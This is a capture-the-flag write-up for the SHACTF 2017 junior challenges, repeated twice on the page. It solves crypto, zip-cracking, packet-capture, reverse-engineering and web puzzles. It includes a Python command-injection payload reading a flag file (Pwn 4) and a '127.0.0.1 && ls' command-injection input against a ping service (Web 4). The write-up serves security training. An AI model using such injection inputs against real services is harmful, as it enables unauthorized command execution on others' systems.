SHACTF 2017 Write up for MISC Junior (200)
Crypt1:All about the base V2VsbCBkb25lLAoKdGhpcyBmaWxlIGlzIGVuY3J5cHRlZCB3aXRoIEJhc2U2NC4gT2Z0ZW4gdXNl
ZCBpbiBDVEYncyB0byBkaXNwbGF5IGJpbmFyeSBkYXRhIGluIGEgbW9yZSBmcmllbmRseSB3YXku IAoKVGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlIGlzIGZsYWd7YjNlOWMzZWVlNjA5YmFjNDZm YWQ0NDM5Y2YzMjFmZTV9Cg==
just base64 decode -> flag
Crypt 1: Rotation
Seems someone rotated the alphabet, can you get the original message back?
Okay, must be caesar right?
i took the part "lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}"
Because i know for sure lrgm must be flag in some ROT
kt.pe is dead :v so i wrote a script to do the job :v
flag: flag{30d3a1aa0cda9f08cdfa52668bc6854a}
:v throw it to quipquip and get the flag :v
flag: flag{a230a7e624afac36291c5f31fa818d6f}
Crypt 3: Exclusive or ... (2)
i'm too lazy to check the frequency too find key, i just use xortool -b to brute it because i know they key length = 1, just brute 255 possible case
flag: flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}
Crypt 3: Tranposition Cipher
We intercepted this secret message. We believe it is using a transposition cipher. Can you decipher it?
you can see c o n g r a t u l a t from the concentrate of every first word right?
i wrote a script to do the job
flag: flag{66153332753b3e86ad4303062e6ecf06}
Misc 1 + Misc 2 :
fcrackzip or John the reaper or web can do this job because the key length is just 5 and 6
pass 1 : 42831
pass 2: future
Misc3 : reverse
after checking the header, we can see clearly
e474 9805 -> 89 50 4e 47 -> PNG HEADER
okay, so it just reversed right?
i wrote a script to recover there position
Network 1 : Download
after checking , we can see that someon want to get file flag.jpg and HTTP 1.1 it means he downloaded the file -> we can get the downloaded file , just use export HTTP function in Wireshark
export the file
get flag
Network 2: WannaBuyAFlag
It just a conversation so we can follow TCP to see what are they doing :v
and get flag
Network 3: Weird Website
:v export HTTP -> get the html
see what inside html, suppriseeeee
Network 4: Captured Mail
wow, it is smtb, so just follow the TCP to see the conversation
so someone sends flag file but it is base64 encrypted , so we just decrypt and get the flag
i wrote a script to do the job
Forensic 3: Deleted file
foremost ?
Pwn 4: small
This program consists of only 4 words, and still they've made a mistake. Read the flag from /home/small/flag
So we should read the flag from /home/small/flag right?
so we just netcat to the server and cat the flag
There is a bug in input func that allowing us to execute any command that we like .
i use __builtins__.__import__('os').system('cat home/small/flag')
or we can write a script to do that :v
Binary 1 : Find The Flag
:v just strings
Binary 3: Hidden Message
.apk -> i use this website to decompiler
then we analyse the result file
insteading of checking every file, i use command :
grep -rnw ~/Desktop/CTF/output/jpg/hidden-message_source_from_JADX -e flag
yeah we got the flag: flag{d3314ac1a08d65ea32ffd30907de2409}
binary 4: Jump Around
I use IDA to analyse this JumpAround, and i found that the flag is just a calculation of
so i write a script to calculate v1
binary 4: Flip a coin
So my idea is how about every time winning, our winning time just only increase 1, how about make them 100
So i try to find the function ADD in ollydbg, and it is at 0x401668
Now we just change 1 (0x1) to 100(0x64) and run the program
and run the program to get flag
Web1 : In your head
Sometimes you have just to listen to your head.
-> must be in the header
Web 2 : Broken image
Seems we have a broken image on our website.
We can see in the broken image, that contains data
just decode the base64 and we got the flag
Web 2: Old school
We found this Old School Website.
So it requires IE6 to connect, we just need to change the User Agent header to MSIE 6.0
Web 3: Location
Like in real estate, the web is all about location, location and location.
So you just hit the "try again" button, and flag will be caught in network
Web 4: Ping
We created a simple ping service.
i dont know who to ping so i try to ping 127.0.0.1 && ls it will execute ls command in web server, and we can see the file s3cr3tfl4g.txt
and we open it to get flag
And this is the flag for MISC Junior ( 200 )
ZCBpbiBDVEYncyB0byBkaXNwbGF5IGJpbmFyeSBkYXRhIGluIGEgbW9yZSBmcmllbmRseSB3YXku IAoKVGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlIGlzIGZsYWd7YjNlOWMzZWVlNjA5YmFjNDZm YWQ0NDM5Y2YzMjFmZTV9Cg==
just base64 decode -> flag
Crypt 1: Rotation
Seems someone rotated the alphabet, can you get the original message back?
Ykksy eua ckxk ghrk zu mkz znk zkdz hgiq. Znk lrgm oy lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}
Okay, must be caesar right?
i took the part "lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}"
Because i know for sure lrgm must be flag in some ROT
kt.pe is dead :v so i wrote a script to do the job :v
flag: flag{30d3a1aa0cda9f08cdfa52668bc6854a}
Crypt2: Substitute Teacher
Hello, my name is Mr. Smith, I will be your substitute teacher for today. I only have one assignment for you today, if you solve it you may go home. Now be silence and solve it, so I can Netflix and chill!
osvi cpm dprzsob ulsd hddsboeiou. iocpg gpaj njii usei. rihzi uli vrhdd tsulpau ehfsob h dpaow,
s'e so uli eswwri pn h oit iqsdpwi pn pjhobi sd uli oit mrhvf po oiunrsy. npj gpaj innpjud s lhzi
h nrhb npj gpa: nrhb{h230h7i624hnhv36291v5n31nh818w6n}
:v throw it to quipquip and get the flag :v
flag: flag{a230a7e624afac36291c5f31fa818d6f}
Crypt 3: Exclusive or ... (2)
We found this strange text, can you get the original from it?
i'm too lazy to check the frequency too find key, i just use xortool -b to brute it because i know they key length = 1, just brute 255 possible case
flag: flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}
Crypt 3: Tranposition Cipher
We intercepted this secret message. We believe it is using a transposition cipher. Can you decipher it?
Citgoe6b0 oohern636 nni.tg1e2 gssThe58e rschii366
aohess3ae tlafcf3dc uvllhl24f lilaaa730 aneglg506 tgnfl{33}
you can see c o n g r a t u l a t from the concentrate of every first word right?
i wrote a script to do the job
Misc 1 + Misc 2 :
We received this zip file, but is asking for a password. All we know is that the password exists of 5 numbers, can you crack this password to get the hidden information?
We received another zip file, which also requires a password. All we know is that the password is an existing English word with a length of 6 and all lowercase. Can you crack this password?
fcrackzip or John the reaper or web can do this job because the key length is just 5 and 6
pass 1 : 42831
pass 2: future
Misc3 : reverse
We found this file on a server on the other side of the world, it looks weird, can you "reverse" it?
after checking the header, we can see clearly
e474 9805 -> 89 50 4e 47 -> PNG HEADER
okay, so it just reversed right?
i wrote a script to recover there position
Network 1 : Download
We have a network capture of someone downloading something from the internet. Can you find what it is?
after checking , we can see that someon want to get file flag.jpg and HTTP 1.1 it means he downloaded the file -> we can get the downloaded file , just use export HTTP function in Wireshark
export the file
get flag
Network 2: WannaBuyAFlag
Analyse this Network capture to get the flag.
It just a conversation so we can follow TCP to see what are they doing :v
and get flag
Network 3: Weird Website
We captured some traffic while visiting this website. Can you get some information from it?
:v export HTTP -> get the html
see what inside html, suppriseeeee
Network 4: Captured Mail
We intercepted this mail message. Can you open the attachment?
wow, it is smtb, so just follow the TCP to see the conversation
so someone sends flag file but it is base64 encrypted , so we just decrypt and get the flag
i wrote a script to do the job
Forensic 3: Deleted file
I accidently deleted a file from my system. Can you get it back for me?
foremost ?
Pwn 4: small
This program consists of only 4 words, and still they've made a mistake. Read the flag from /home/small/flag
nc small.stillhackinganyway.nl 1337
So we should read the flag from /home/small/flag right?
so we just netcat to the server and cat the flag
There is a bug in input func that allowing us to execute any command that we like .
i use __builtins__.__import__('os').system('cat home/small/flag')
or we can write a script to do that :v
Binary 1 : Find The Flag
There is a flag hidden in this binary. Can you find it?
:v just strings
Binary 3: Hidden Message
This file contains a hidden message. Can you reverse engineer it and find it?
.apk -> i use this website to decompiler
then we analyse the result file
insteading of checking every file, i use command :
grep -rnw ~/Desktop/CTF/output/jpg/hidden-message_source_from_JADX -e flag
yeah we got the flag: flag{d3314ac1a08d65ea32ffd30907de2409}
binary 4: Jump Around
Jump up, jump up and get down!
so i write a script to calculate v1
binary 4: Flip a coin
We can not seem to win this game that we found, can you?
So my idea is how about every time winning, our winning time just only increase 1, how about make them 100
So i try to find the function ADD in ollydbg, and it is at 0x401668
Now we just change 1 (0x1) to 100(0x64) and run the program
and run the program to get flagWeb1 : In your head
Sometimes you have just to listen to your head.
-> must be in the header
Web 2 : Broken image
Seems we have a broken image on our website.
We can see in the broken image, that contains data
just decode the base64 and we got the flag
Web 2: Old school
We found this Old School Website.
So it requires IE6 to connect, we just need to change the User Agent header to MSIE 6.0
Web 3: Location
Like in real estate, the web is all about location, location and location.
So you just hit the "try again" button, and flag will be caught in network
Web 4: Ping
We created a simple ping service.
i dont know who to ping so i try to ping 127.0.0.1 && ls it will execute ls command in web server, and we can see the file s3cr3tfl4g.txt
and we open it to get flag
And this is the flag for MISC Junior ( 200 )
kt.pe is now kt.gy
Trả lờiXóaoh tks dude, i thought it was dead hehe
Xóa